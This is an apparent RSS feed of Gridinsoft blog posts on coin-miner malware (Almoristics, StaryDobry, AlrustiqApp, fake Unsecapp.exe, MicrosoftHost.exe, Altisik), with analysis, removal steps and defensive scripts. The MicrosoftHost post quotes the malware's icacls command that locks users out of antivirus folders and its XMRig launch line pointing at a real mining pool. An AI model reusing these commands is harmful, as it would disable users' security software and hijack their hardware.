Coin Miner – Gridinsoft Blog
https://gridinsoft.com/blogs
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Feed last built: Wed, 09 Jul 2025 01:19:30 +0000

Almoristics Application: What It Is & How to Remove Virus Miner
https://gridinsoft.com/blogs/almoristics-application/
Tue, 20 May 2025 12:16:15 +0000

Almoristics Application is a devious crypto miner that’s causing headaches for countless Windows users. It’s definitely not a legitimate Windows process – just a parasite designed to mine cryptocurrency while you wonder why your computer’s fans sound like they’re preparing for takeoff. You’ll typically spot it in Task Manager with a suspicious heart-shaped icon, looking deceptively innocent while it drains your system resources.

Almoristics Application (AlmoristicsService) Overview

This freeloader (also called Almoristics Service) belongs to the family of crypto-mining Trojans that have been making the rounds lately. Think of it as an unwelcome roommate who moved in without permission and is now running a bitcoin mining operation from your living room.

The Almoristics Application in Task Manager

Your first clue that something’s wrong? Your CPU usage shoots through the roof, and your computer starts moving like it’s wading through molasses. The fan noise alone might make you think your laptop is planning to achieve liftoff. Meanwhile, your electricity bill climbs while this uninvited guest mines Monero or other cryptocurrencies for someone else’s wallet.

Technical Details

Almoristics Application is essentially the new kid on the block in a family of similar threats like Altruistics or Alrustiq App. These applications hijack your computer’s processing power to mine cryptocurrencies like Monero or Zcash. The attackers pocket the profits while you’re left with the computing equivalent of a car running on fumes.

This malware typically sneaks in disguised within software from sketchy sources – that “free” version of expensive software from a dubious website probably wasn’t such a bargain after all. Once it makes itself at home, the cryptojacking begins, with CPU usage often spiking to a system-crippling 80%.

Beyond just mining, this virus might also modify system settings and create backdoors for even more unwelcome visitors. To avoid detection, it plays dress-up with various aliases like Alrisit, Altisik, or AltrsikApplication – making it trickier for your antivirus to catch.

How Did I Get Infected?

Let’s be honest – Almoristics doesn’t teleport onto your system by magic. The most common infection route is through bundled downloads – it hitchhikes alongside “free” software, game mods, or key generators from questionable websites. That moment when you rapidly clicked “Next” during installation without reading the fine print? That’s when you likely invited this resource vampire inside.

The software bundler example

Other common infection vectors include spam emails with malicious attachments or deceptive links. Those suspicious “YOU WON’T BELIEVE WHAT HAPPENED NEXT” ads on sketchy websites can also trigger automatic downloads. Outdated software with unpatched vulnerabilities makes infection even easier, which is why Windows 7 and 8 users are particularly vulnerable targets.

How To Remove It?

Getting rid of Almoristics requires a systematic approach since it tends to dig in and resist casual removal attempts. First, boot into Safe Mode with Networking (check out how to get into safe mode here if you need guidance). This limits what processes can run, preventing the malware from overwhelming your system during the cleanup operation.

Next, run a full system scan with a reliable anti-malware program like GridinSoft Anti-Malware, which can detect and remove all the files, folders, and registry keys associated with this trojan virus. The cleanup might take some time if there are numerous infections, but patience pays off when you get your computer performance back.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Real-World Encounters with Almoristics

Reddit users have been sharing their battle stories with this crypto-mining invader, and it’s not pretty. One user reported that Almoristics was chewing through a staggering 95% of their CPU resources, turning their gaming PC into what they described as “an expensive space heater that can’t even run Notepad properly.” Several others noticed their GPUs were also being hijacked, making graphics-intensive tasks nearly impossible.

What makes Almoristics particularly sneaky is its persistence mechanisms. If you simply try to end the task in Task Manager, it’ll often respawn within seconds. Some Reddit users report that the malware creates scheduled tasks and registry autorun entries with random names, making manual removal a frustrating game of whack-a-mole. One technically-savvy user even discovered the malware injecting itself into legitimate Windows processes to avoid detection.

Interestingly, Almoristics seems to have some self-preservation instincts built in. Multiple users have observed that it can detect when Task Manager is opened and temporarily reduce its resource usage to avoid drawing attention. Once you close Task Manager, it ramps back up to full mining capacity. It’s like watching a cockroach play dead when the lights come on, only to scurry away when you turn your back.

This malware variant has also been linked to performance issues beyond mere slowdowns. Several Reddit users mentioned experiencing thermal throttling as their CPUs reached dangerous temperatures, and a few even reported system crashes when their cooling systems couldn’t keep up with the constant 100% load. One particularly unfortunate user claimed their relatively new laptop’s battery life plummeted from 6 hours to less than 45 minutes after infection.

After removal, you’ll notice an immediate performance improvement – your CPU usage will drop back to normal levels, your fans will stop screaming, and your computer will respond like it should. Think of it as evicting that cryptomining squatter who was draining your resources and electricity.


Want to stay protected from future infections? Keep your operating system and software updated, be cautious about what you download and from where, and maintain a healthy suspicion of “too good to be true” offers for free premium software. Remember, in the modern world as in life, if you’re not paying for the product, you might be the product – or in this case, your computer’s processing power might be.

The post Almoristics Application: What It Is & How to Remove Virus Miner appeared first on Gridinsoft Blog.

StaryDobry Malware Hides in Pirated Games, Deploys XMRig
https://gridinsoft.com/blogs/starydobry-pirated-games-xmrig/
Wed, 19 Feb 2025 19:30:22 +0000

A major malware campaign named StaryDobry infected gamers by distributing trojanized versions of popular games like Garry’s Mod, BeamNG.drive, and Dyson Sphere Program via torrent sites. The malware, embedded in game installers, leveraged the high processing power of gaming PCs to run XMRig cryptocurrency miner and fill the pockets of cybercriminal actors.

StaryDobry Delivers XMRig Miner Malware in BeamNG, Garry’s Mod

Cybersecurity researchers have uncovered a massive malware spreading campaign. Dubbed StaryDobry, it has been targeting gamers by distributing trojanized versions of cracks for popular games. These include Garry’s Mod, BeamNG.drive, and Dyson Sphere Program. All of the weaponized versions were promoted on websites dedicated to unlicensed software and p2p sharing.

Torrent with StaryDobry malware (source: Securelist)

The campaign, which started in December 2024 and lasted until late January 2025, primarily targeted users in Germany, Russia, Brazil, Belarus, and Kazakhstan. There are a few posts with malicious distributions still available on the websites, although written in Russian.

The malware was embedded within game installers and spread widely over the holiday season when torrent activity peaks. Once installed, the malware delivered an XMRig cryptominer, exploiting gaming PCs’ high processing power for mining Monero cryptocurrency.

Interestingly, a compromised BeamNG.drive mod was reportedly linked to a breach at Disney in mid-2024. While some believe this was a coincidence rather than a targeted attack, malware turning up in a mod used inside a major corporation is hardly a novelty by now. Despite thorough analysis, no direct attribution to a known threat group has been made, though the campaign appears to have Russian-speaking origins.

Technical Details

The infection chain begins in a rather typical manner – with users downloading cracked game installers from p2p networks. These installers contained the legitimate game alongside a hidden malware dropper (unrar.dll). By the way, I have repeatedly mentioned that pirating is not good; I even wrote a separate post about it.

Malicious installer (source: Securelist)

Upon installation, the dropper executed in the background, checking for virtual machines or security tools before proceeding. If no threats were detected, the malware registered itself using regsvr32.exe for persistence. It then collected system information, including OS details, CPU specs, and GPU capabilities. The data was then sent to the command and control (C2) server at pinokino[.]fun.

Payload Deployment

Next, the malware decrypted and installed a secondary loader (MTX64.exe), disguising it as a Windows system file to evade detection. This loader created a scheduled task for persistence and ensured that only systems with at least eight CPU cores would proceed with the crypto mining operation. If the conditions were met, the loader downloaded and launched a modified version of the XMRig miner.

This miner was customized to avoid detection by constructing its configuration internally instead of using traditional arguments. It also continuously monitored system processes, shutting itself down if security tools were detected. Unlike standard XMRig miners, this variant connected to private mining servers rather than public pools, making it harder to track the stolen computational power.

Researchers observed that the malware used extensive evasion techniques. These included file name spoofing, timestamp manipulation, and encrypted communication with C2 servers. The campaign appeared highly opportunistic, leveraging the increased demand for cracked games during the holiday season to infect as many users as possible.

How To Stay Safe

The simplest way to avoid infection is to stay away from pirated software and torrent sites. However, in the case of BeamNG.drive mods, even legitimate users could unknowingly install malware, meaning vigilance is required beyond just avoiding piracy. It’s crucial to verify the source of all software, especially game mods, and to rely on trusted developers.

Users should also monitor system performance, as unexpected slowdowns or high CPU usage may indicate cryptominer activity. To minimize risks, users should employ reputable anti-malware solutions that can detect and block such threats. GridinSoft Anti-Malware is an effective tool for identifying and removing StaryDobry malware. Download it by clicking the banner below and activate the protection right now!


The post StaryDobry Malware Hides in Pirated Games, Deploys XMRig appeared first on Gridinsoft Blog.

AlrustiqApp.exe Virus (Alrustiq Service)
https://gridinsoft.com/blogs/alrustiqapp-exe-virus/
Sun, 19 Jan 2025 22:50:51 +0000

AlrustiqApp.exe is a process you can notice in your Task Manager, with anomalously high CPU consumption. It causes the computer to become extremely slow and unresponsive, so using it becomes barely possible. In this article, I will explain what this process is, how it appeared, and how to remove it.

What is AlrustiqApp (Alrustiq Service) Process?

AlrustiqApp.exe is a process of a coin miner virus, a program that aims at exploiting your hardware to mine cryptocurrencies. Users report it appearing in the Task Manager with a distinctive heart or gift-box icon and a processor load of 90-95%. In some menus, it is present as Alrustiq Service, which confuses users into thinking it is a part of Windows or another legitimate software.

Alrustiq app Task Manager

Our team recognized this virus on January 10, 2025. This malicious miner is a part of a large group of similar viruses, all of which use similar naming schemes and disguises. All of them create high CPU load regardless of system configuration, which means even the beefiest systems will be brought to their knees by this virus.

Log of AlrustiqApp file location, found during the threat analysis process

AlrustiqApp virus creates its folder in C:\Program Files (x86) – a typical placement for its group, yet not usual for other viruses. Its executable file and other elements are stored here; it is theoretically possible to delete it from this directory, but it won’t be that easy. The malware protects itself from user interruption by having constantly running background processes. All of them restart should the user try to stop them from the Task Manager.

There is an interesting detail that makes this malware stand out from the others: it uses a valid digital certificate, issued to AlrustiqDevMD Group. That certificate leads a lot of antiviruses to assume the file is safe; GridinSoft, however, relies on other signatures and thus detects and removes the file without issue.

AlrustiqService file on VirusTotal
AlrustiqAppl.exe file on VirusTotal

Users also report spyware infection symptoms along with this virus. That means it is highly possible that AlrustiqApp is distributed along with a selection of other malicious software. This matches the typical spreading methods the Alrustiq virus uses, as they are the same as for a number of other malware.

User complaining about the symptoms of spyware activity (leaked credit card credentials) after dealing with a similar threat

How did I get infected?

There are several infection vectors of AlrustiqApp and similar viruses that we have a record of. One of the key ways of getting into a user machine is through pirated software of different types. Downloaded from questionable websites or P2P networks, such files can carry a piece of code that downloads and installs viruses together with the actual app. That is one of the reasons why we heavily recommend avoiding pirated software at all costs.

Another way this malware could have gotten into the system is through software bundles. The process is somewhat similar to the one with pirated apps, yet this time the threat may be sitting in a freeware program. During the installation, one clicks through a number of windows that ask to “proceed with standard installation”. The catch is exactly there: one of these windows asks to confirm the installation of AlrustiqApp.

How to Remove AlrustiqApp.exe Virus?

To remove the AlrustiqApp virus, I recommend scanning your computer with GridinSoft Anti-Malware. Its advanced detection system will easily identify and eliminate the annoying virus from your computer, ensuring that no other malware remains active.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Step 1. Switching to the Safe Mode with Networking

The first step is rebooting your computer in Safe Mode with Networking. That way, you stop the AlrustiqApp virus from starting upon system startup. For this, press “Start”, hold the “Shift” key, and select “Restart”. A system recovery screen will appear, with a selection of boot options.

Shift + restart Windows Recovery menu

Here, go to Advanced Options → Startup Settings, and press the button number that is next to “Enable Safe Mode with Networking” (it changes from one system build to another).

Steps to run pc in the safe mode

Step 2. Remove the AlrustiqApp.exe Virus

After loading into Safe Mode with Networking, you are all set to proceed with the removal. Install GridinSoft Anti-Malware, and run a Full Scan to check the most remote corners of the system. This ensures that no malware will be left undetected. After the scan is finished, click the Clean Now button to delete all the malware. Reboot the system to get back to normal Windows mode.

Don’t miss out on a 6-day free trial option! It will allow you to get a full protection of your PC and test all the features that GridinSoft has. No card required: just type in your email and you will get the trial code.

The post AlrustiqApp.exe Virus (Alrustiq Service) appeared first on Gridinsoft Blog.

What is Unsecapp.exe and Should I Remove It?
https://gridinsoft.com/blogs/unsecapp-exe/
Thu, 09 Jan 2025 15:31:57 +0000

Unsecapp.exe is a process you may notice in the Task Manager, seemingly without any reason or purpose. Users report it popping up for no apparent reason, and in some cases, it consumes a lot of CPU power. In this article, I will explain where this process comes from and what you should do about it.

What is Unsecapp.exe?

Unsecapp.exe is a process related to the built-in Windows Management Instrumentation (WMI) subsystem, a part of pretty much every Windows installation. It is required to orchestrate applications’ access to operating system resources, and this specific process is responsible for providing the apps with an interface to receive WMI responses.

In normal situations, Unsecapp.exe starts together with the system, but does not show up in the Task Manager until a certain app starts using WMI calls, forcing the process to start running actively.

Some malicious programs may leverage WMI functionality, consequently using the Unsecapp.exe process for their own needs. However, users will likely see a different picture: the malware hiding under the guise of a system process.

Is Unsecapp.exe process a virus?

In normal situations, Unsecapp.exe is no threat to the system and the user. It is located in the C:\Windows\System32 folder, and has all the certificates needed to identify it as a system file. To check whether the process you’re seeing in the Task Manager is legit, click it with the right mouse button and choose “Open file location”.

Location of a genuine unsecapp.exe file

This opens the folder where the executable is located. If it is anything but the said System32 folder, you are likely dealing with a malicious impostor.

Despite being of a benign nature, the name of this process may be used by malware to hide among other genuine processes. It is possible for malware to abuse the process for its purposes, but most often we are talking about hijacking the name. In that case, you may notice Unsecapp.exe causing high CPU load, and being listed among user processes rather than system ones.
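As an added example (written for this page, not code from the Gridinsoft post), the Python below applies the location rule from the paragraphs above to a list of process records such as one could copy out of Task Manager or a process-listing tool: a process named unsecapp.exe is flagged as an impostor when its image path is not the System32 folder, and any other binary outside System32 with a sustained high CPU load is marked suspicious. The records, the impostor's path and the 80% cut-off are constructed assumptions.

```python
"""Triage Task Manager-style process records by image location.

Added example for this page, not code from the Gridinsoft post. The process
records below are constructed to mirror the two cases the post describes: a
genuine unsecapp.exe running from System32 and a coin-miner impostor running
from a user-writable folder. Field names, the impostor's folder path and the
CPU cut-off are this example's own assumptions.
"""
import ntpath

# Folder where the genuine unsecapp.exe lives (per the post).
SYSTEM32 = r"C:\Windows\System32"

# Names of genuine Windows binaries that the post says miners impersonate.
SYSTEM_BINARY_NAMES = {"unsecapp.exe"}

# Sustained CPU share the post associates with mining activity (assumed cut-off).
HIGH_CPU_PERCENT = 80.0

# Constructed sample records: name, image path, CPU %, account.
SAMPLE_PROCESSES = [
    {"name": "unsecapp.exe", "path": r"C:\Windows\System32\unsecapp.exe",
     "cpu": 0.3, "user": "SYSTEM"},
    {"name": "unsecapp.exe", "path": r"C:\Users\alice\AppData\Roaming\WinSvc\unsecapp.exe",
     "cpu": 92.0, "user": "alice"},
    {"name": "notepad.exe", "path": r"C:\Windows\System32\notepad.exe",
     "cpu": 1.0, "user": "alice"},
]


def _in_directory(path, directory):
    """True if `path` sits directly in `directory`, compared with Windows
    rules (case-insensitive, forward and backward slashes treated alike)."""
    file_dir = ntpath.normcase(ntpath.dirname(ntpath.normpath(path)))
    return file_dir == ntpath.normcase(ntpath.normpath(directory))


def classify(record):
    """Return (verdict, reason) for one process record.

    verdict is "impostor" when a system-binary name runs from outside
    System32, "suspicious" when any other binary outside System32 shows a
    sustained high CPU load, and "ok" otherwise.
    """
    name = record["name"].lower()
    in_system32 = _in_directory(record["path"], SYSTEM32)
    reasons = []
    if name in SYSTEM_BINARY_NAMES and not in_system32:
        reasons.append("system binary name running from "
                       + ntpath.dirname(record["path"]))
    if record["cpu"] >= HIGH_CPU_PERCENT and not in_system32:
        reasons.append("sustained CPU %.0f%% under account %s"
                       % (record["cpu"], record["user"]))
    if not reasons:
        return "ok", "location matches" if in_system32 else "no indicator"
    verdict = "impostor" if name in SYSTEM_BINARY_NAMES else "suspicious"
    return verdict, "; ".join(reasons)


def triage(records):
    """Classify every record; returns a list of (path, verdict, reason)."""
    return [(r["path"],) + classify(r) for r in records]


if __name__ == "__main__":
    for path, verdict, reason in triage(SAMPLE_PROCESSES):
        print("%-10s %s (%s)" % (verdict, path, reason))
```

The comparison is done with ntpath so the check behaves like Windows (case-insensitive, either slash) even when the script runs elsewhere; a genuine unsecapp.exe that briefly shows CPU activity from System32 is still reported as ok, which matches the post's advice not to remove the legitimate process.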

In our analysis, the vast majority of fake Unsecapp.exe instances belong to coin miner malware. Such viruses exploit CPU calculation power to mine cryptocurrencies. Yet this is not only about overloading the system: the malware does a lot of tweaking with system settings, which can cause a lot of troubles.

Malicious impostor process in the Task Manager

To facilitate its communications with mining pools, it changes system firewall settings, disabling the restrictions for the malicious URL. In order to provide itself with max privileges and make it harder for the user to stop it, the virus modifies a huge amount of registry keys. All these changes may lead to Internet connection problems or system instability, if not removed properly.

Registry keys modified by the coin miner virus

Should I Delete Unsecapp.exe?

If you observe Unsecapp.exe occasionally appearing in the Task Manager, without any excessive consumption of system resources, then you should not remove it, as you are seeing the legit process. Deleting it may break the functionality of many programs that rely on it.

However, when you see anomalous behavior, like high CPU consumption and a file location outside Windows\System32, then it is time to worry. Removing malware that impersonates a system process requires advanced security software. GridinSoft Anti-Malware has you covered in this case: download it by clicking the banner below, and follow the instructions.

Step 1. Switching to the Safe Mode with Networking

Before removing the threat, one should switch Windows into Safe Mode with Networking. By doing so, you stop the malware from automatically starting together with the system. The continuous load it creates makes it impossible for other software to run properly.

To boot into Safe Mode with Networking, click the Windows button and choose the Restart option while holding the Shift key. This launches the system recovery screen.

Shift + restart Windows Recovery menu

In the menu, go to Advanced Options → Startup Settings, and press the button number that is next to “Enable Safe Mode with Networking” (it may change from one system build to another).

Steps to run pc in the safe mode

Step 2. Remove the Unsecapp.exe Virus

Once in the Safe Mode, you are free from the overhead created by the miner virus. Install and run GridinSoft Anti-Malware; pick Full Scan option to make the program check even the most remote corners of the system. After the scanning process, click the Clean Now button to remove all the detected elements.

After that, simply reboot the computer to return to the normal Windows boot. The system should be as good as new, without any strange processes popping up in the Task Manager.

The post What is Unsecapp.exe and Should I Remove It? appeared first on Gridinsoft Blog.

MicrosoftHost.exe
https://gridinsoft.com/blogs/microsofthost-exe-high-cpu-removal/
Thu, 26 Dec 2024 15:49:03 +0000

MicrosoftHost.exe is a malicious process that the malware creates to disguise itself as a benign process. Users may witness high CPU load coming from this specific process. Despite its name, it is not associated with Microsoft in any way. In this post, I will explain what this process is and how to remove it.

MicrosoftHost.exe Overview

MicrosoftHost.exe is malware masquerading as a Windows system process. Despite the rather convincing name, this process doesn’t belong to Windows system processes. The main purpose of this virus is to utilize your computer’s resources to mine cryptocurrency for attackers. For the user, it only results in a significant load on the system and makes it inoperable.

MicrosoftHost.exe in the Task Manager

This process falls into the category of cryptocurrency miner viruses. These programs use computing power to mine Monero or other anonymous currencies. Miners typically do not corrupt user files, which is a slight relief. However, in addition to significantly degrading system performance, MicrosoftHost.exe prevents the installation of anti-malware, which I will discuss next.

Like most similar threats, MicrosoftHost.exe is mostly distributed via applications downloaded from unreliable sources. Users, eager to get free access to paid software, download such files without a shred of doubt, disabling system protection during installation, unaware of the embedded malicious code.

Signs of MicrosoftHost.exe infection are fairly obvious. You may notice CPU constantly running at 80-100% even in idle state, when the system does not have any apps running. Such a continuous load is similar to a stress-test, which means an increased risk of overheating and increased wear of PC parts.

Laptop users may see an increased battery discharge when the machine is infected with this virus. Laptops are also designed with much less continuous loads in mind, meaning that their cooling systems are less capable of handling huge amounts of heat. This may lead to even worse wear and even malfunctions.

Detailed Analysis

To understand what we are dealing with, let’s take a closer look at this miner. MicrosoftHost.exe is an XMRig-based miner that is designed to mine Monero. XMRig is a legit open-source coin miner, which is misused by cybercriminals at a massive scale for illegal purposes.

Once the malicious file is executed, several VBS and batch scripts are run that initiate the installation of the miner and the system setup for it. The customization is done by manipulating the registry using the regedit.exe process.

This is a long process that is repeated several times and I won’t go into too much detail about it, but I will still highlight a few things. At some point, MicrosoftHost.exe uses PowerShell commands to prevent a selection of antivirus programs from launching:

  • Malwarebytes
  • ByteFence
  • 360 Total Security
  • SpyHunter
  • Enigma
  • Avast
  • AVG
  • Norton
  • McAfee

The command that the malware uses does a rather simple trick: it changes the user access permissions for the folder of each antivirus program. As a result, one becomes unable to launch the antivirus program.

/c icacls "C:\Program Files\%antivirus_name%" /deny %username%:(OI)(CI)(F)

After all these preparations, the malware with MicrosoftHost.exe executes the following command:

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1

This command runs the miner itself and passes it its working parameters. Among them are the mining pool address (loders.xyz) with its connection parameters, the number of CPU threads to use for mining, and some minor internal parameters. All these settings correspond to the “vanilla” XMRig miner.
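As an added example (written for this page, not code from the Gridinsoft post), the Python below parses a command line of the shape shown above and pulls out the fields a defender would put into a detection rule or an incident note: the pool host and port, the thread count, and the presence of XMRig-only switches such as --donate-level. The miner command line is the one quoted above; the benign svchost.exe line is constructed for comparison, and the scoring and its threshold are this example's own choice.

```python
"""Pull detection-relevant fields out of an XMRig-style miner command line.

Added example for this page, not code from the Gridinsoft post. The miner
command line is the one quoted in the post; the benign command line is
constructed for comparison. Option names follow XMRig's public command-line
options (-o/--url, -u/--user, -p/--pass, -t/--threads, -k/--keepalive,
--donate-level); the scoring and the cut-off are this example's own choice.
"""
import shlex
from urllib.parse import urlsplit

# Command line quoted in the post.
MINER_CMDLINE = (r"C:\ProgramData\WindowsTask\MicrosoftHost.exe "
                 "-o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1")
# Constructed benign sample: an ordinary service host command line.
BENIGN_CMDLINE = r"C:\Windows\System32\svchost.exe -k netsvcs -p"

# XMRig options that take a value, mapped to a field name.
VALUE_OPTS = {"-o": "url", "--url": "url", "-u": "user", "--user": "user",
              "-p": "pass", "--pass": "pass", "-t": "threads", "--threads": "threads",
              "--donate-level": "donate_level"}
# XMRig options that are bare switches.
FLAG_OPTS = {"-k": "keepalive", "--keepalive": "keepalive"}


def parse_cmdline(cmdline):
    """Split a Windows command line and return (image path, {field: value}).

    Handles the three spellings XMRig accepts: '-o value', '--opt=value'
    and the attached short form '-t1'. shlex in non-POSIX mode keeps
    backslashes intact and keeps quotes, which are stripped from the image.
    """
    tokens = shlex.split(cmdline, posix=False)
    image = tokens[0].strip('"') if tokens else ""
    opts = {}
    i = 1
    while i < len(tokens):
        name, value = tokens[i], None
        if name.startswith("--") and "=" in name:
            name, value = name.split("=", 1)          # --donate-level=1
        elif name.startswith("-") and not name.startswith("--") and len(name) > 2:
            name, value = name[:2], name[2:]          # -t1
        if name in FLAG_OPTS:
            opts[FLAG_OPTS[name]] = True
        elif name in VALUE_OPTS:
            if value is None and i + 1 < len(tokens):
                value = tokens[i + 1]                 # -o value
                i += 1
            opts[VALUE_OPTS[name]] = value
        i += 1
    return image, opts


def miner_indicators(cmdline):
    """Score a command line for XMRig-style mining indicators.

    A stratum pool URL weighs 2, a wallet/worker name given together with a
    pool URL 1, and a --donate-level setting 1; a score of 2 or more is
    reported as a miner. Scheme-less pool addresses, which XMRig also
    accepts, are not recognised by this simple check.
    """
    image, opts = parse_cmdline(cmdline)
    result = {"image": image, "pool_host": None, "pool_port": None,
              "threads": None, "score": 0}
    url = opts.get("url")
    if url:
        parts = urlsplit(url)
        if parts.scheme.lower().startswith("stratum"):
            result["score"] += 2
            result["pool_host"], result["pool_port"] = parts.hostname, parts.port
        if opts.get("user"):
            result["score"] += 1
    if opts.get("donate_level") is not None:
        result["score"] += 1
    threads = opts.get("threads")
    if threads and threads.isdigit():
        result["threads"] = int(threads)
    result["is_miner"] = result["score"] >= 2
    return result


if __name__ == "__main__":
    for cmd in (MINER_CMDLINE, BENIGN_CMDLINE):
        print(miner_indicators(cmd))
```

Process command lines of this kind are available from the Task Manager's "Command line" column or from process-creation telemetry, and the extracted pool host is the piece to feed into network blocking or DNS monitoring; the image path under ProgramData is a second, independent clue that the post also points out.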

How To Remove?

The removal process of MicrosoftHost.exe takes several steps, due to the complexity of the infection and the changes it makes to the system. First, we are going to stop the malware, as it overloads the system and obstructs the normal functioning of antivirus programs. Then, we can switch to deleting the virus.

Step 1. Switching to the Safe Mode with Networking

You should begin by rebooting your device in Safe Mode with Networking. To do this, press “Start”, hold the “Shift” key, and select “Restart”. This will send you to the Windows Recovery screen, which offers a selection of options.

Shift + restart Windows Recovery menu

In the menu, go to Advanced Options → Startup Settings, and press the button number that is next to “Enable Safe Mode with Networking” (it may change from one system build to another).

Steps to run pc in the safe mode

Step 2. Remove the MicrosoftHost.exe Virus

Once in the Safe Mode, you are free from the overhead created by the miner virus. To remove it completely, consider using GridinSoft Anti-Malware: it will detect and remove even the most evasive malicious program, let alone minor viruses based on an open-source one. Download it by clicking the banner below and run a Full scan to check even the most remote areas of the system.


Step 3. Revert the Malicious Changes

When the removal is over, you can proceed with undoing the blocks that the malware has placed on antivirus programs. You will need to find the path to each antivirus program's folder and substitute it for the quoted path in the command below.

C:\Windows\System32\icacls.exe "C:\Program Files\%antivirus_name%" /grant Everyone:(OI)(CI)(F)

Run the command for each antivirus you have installed (excluding GridinSoft, as you’ve installed it after the infection). After that, your system will be as good as new.
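Added here as an example, not code from the original post: instead of hunting for each locked folder by hand, this PowerShell script lists program folders that carry an explicit Deny entry for the current user (the trace left by the icacls /deny trick described above) and strips only that entry with icacls /remove:d, leaving the rest of the ACL untouched. The root folders and the account name are assumptions; run it from an elevated prompt.

```powershell
# Added example (not from the original post): audit and repair the Deny ACEs that the
# "icacls <folder> /deny <user>:(OI)(CI)(F)" trick leaves on antivirus folders.

function Find-DenyAcesForUser {
    param(
        # Folders where antivirus products are normally installed (assumption)
        [string[]]$Roots   = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:ProgramData),
        # Account the malware denied; icacls %username% resolves to DOMAIN\user or COMPUTER\user
        [string]  $Account = "$env:USERDOMAIN\$env:USERNAME"
    )
    foreach ($root in $Roots) {
        if (-not $root -or -not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Directory -ErrorAction SilentlyContinue | ForEach-Object {
            $acl = Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { return }
            foreach ($ace in $acl.Access) {
                # Only explicit (non-inherited) Deny entries for this account are of interest:
                # that is exactly what the malware's icacls command creates
                if ($ace.AccessControlType -eq 'Deny' -and -not $ace.IsInherited -and
                    $ace.IdentityReference.Value -ieq $Account) {
                    [pscustomobject]@{
                        Folder   = $_.FullName
                        Identity = $ace.IdentityReference.Value
                        Rights   = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}

function Remove-DenyAceForUser {
    param(
        [Parameter(Mandatory)][string]$Folder,
        [string]$Account = "$env:USERDOMAIN\$env:USERNAME"
    )
    # /remove:d deletes every Deny entry for the named account and leaves Allow entries alone,
    # so the folder is not opened up to Everyone as a side effect
    & icacls.exe $Folder /remove:d $Account
}

$locked = @(Find-DenyAcesForUser)
$locked | Format-Table -AutoSize
foreach ($entry in $locked) {
    Remove-DenyAceForUser -Folder $entry.Folder -Account $entry.Identity
}
```

Review the printed list before the loop runs it; a Deny entry that you or an administrator set on purpose should be left in place.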

Altisik Service Virus Analysis & Removal https://gridinsoft.com/blogs/altisik-service-virus/ https://gridinsoft.com/blogs/altisik-service-virus/#respond Fri, 20 Sep 2024 12:35:07 +0000 https://gridinsoft.com/blogs/?p=26391 Altisik Service is a malicious coin miner that usually installs and runs on the target system without the explicit consent of the PC owner. It disguises itself as a Windows service, which makes it difficult to stop or remove. Let’s have a closer look at how this malware operates and how to delete it from […]

The post Altisik Service Virus Analysis & Removal appeared first on Gridinsoft Blog.

Altisik Service is a malicious coin miner that usually installs and runs on the target system without the explicit consent of the PC owner. It disguises itself as a Windows service, which makes it difficult to stop or remove. Let’s have a closer look at how this malware operates and how to delete it from the system.

Altisik Service Overview

Altisik Service is a malicious coin miner masquerading as a legitimate Windows process. It is used for hidden illegal cryptocurrency mining, thereby creating a significant load on the processor (up to 80% or 100%). However, this miner differs in one key aspect – it registers itself in the system as a service. This way, hackers make their malware much harder to dislodge. Attempts to manually stop or delete the service can lead to critical system failures, potentially causing a “blue screen of death”.

Altisik Service in the Task Manager screenshot
Altisik Service in the Task Manager

Attackers choose the form of a service for their malware not only for the sake of sustainability. Unlike executable files, services are suspected of malicious activity much less often, simply because users trust them more. Also, Windows services can get higher privileges much more easily, and with less suspicion from security software.

As for the distribution method, users on Reddit report receiving Altisik as an unwanted “bonus” with other software. Miners generally enter systems disguised as bundled software within installers of cracked programs. Another method is through additional malware already present on the computer: vast loader malware botnets can offer huge gains for the operators of malicious coin miners.

Altisik Analysis

Upon execution, Altisik checks for virtual environments and security mechanisms by accessing specific system files and registry keys related to .NET configurations and GPU settings. It pays special attention to Windows Defender settings, especially those concerning real-time protection, by examining related directories and registry entries to potentially disable or bypass these security features. To evade detection, the malware employs stalling tactics with long periods of inactivity, aiming to hinder dynamic analysis and circumvent antivirus sandboxes that might report the file as safe due to lack of immediate activity. These strategies enable Altisik to stealthily operate on infected systems, mining cryptocurrency without user awareness.

Let’s have a closer look at the behavior of the Altisik miner. At the beginning, it is rather typical for a coin miner: upon launching itself, Altisik initially checks for a virtual environment and security mechanisms. Specifically, it checks the following locations:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\Drivers
HKEY_CURRENT_USER\Software\Microsoft\DirectX\UserGpuPreferences

Further, it pays special attention to Windows Defender settings, specifically ones that touch real-time protection. The malware checks the following system sections.

C:\Program Files\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\PassiveMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

